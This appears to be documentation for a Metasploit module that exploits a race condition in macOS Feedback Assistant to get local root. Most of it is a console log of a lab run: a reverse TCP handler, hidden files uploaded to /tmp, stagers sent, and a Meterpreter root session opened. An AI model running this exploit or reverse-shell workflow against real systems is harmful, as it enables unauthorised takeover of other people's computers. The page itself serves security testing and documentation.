2020-01-20 21:26:59 -05:00
## Vulnerable Application

This module exploits a race condition in macOS's Feedback Assistant, which leads to local privilege escalation to root.
## Scenarios

```
msf5 exploit(osx/local/feedback_assistant_root) > check
[*] The target appears to be vulnerable.
msf5 exploit(osx/local/feedback_assistant_root) > run

[*] Started reverse TCP handler on 172.16.135.1:5555
[*] Uploading file: '/tmp/.fjbgrf'
[*] Uploading file: '/tmp/.fljhjbwe'
[*] Executing exploit '/tmp/.fljhjbwe'
[*] Transmitting first stager...(210 bytes)
[*] Exploit result:
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
2019-05-20 10:36:13.750 .fljhjbwe[1059:12661] [LightYear] Now race
2019-05-20 10:36:13.881 .fljhjbwe[1059:12661] [LightYear] Stage 1 succeed
2019-05-20 10:36:14.099 .fljhjbwe[1059:12663] [LightYear] It works!
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 172.16.135.130
[*] Meterpreter session 2 opened (172.16.135.1:5555 -> 172.16.135.130:49256) at 2019-05-20 12:36:14 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```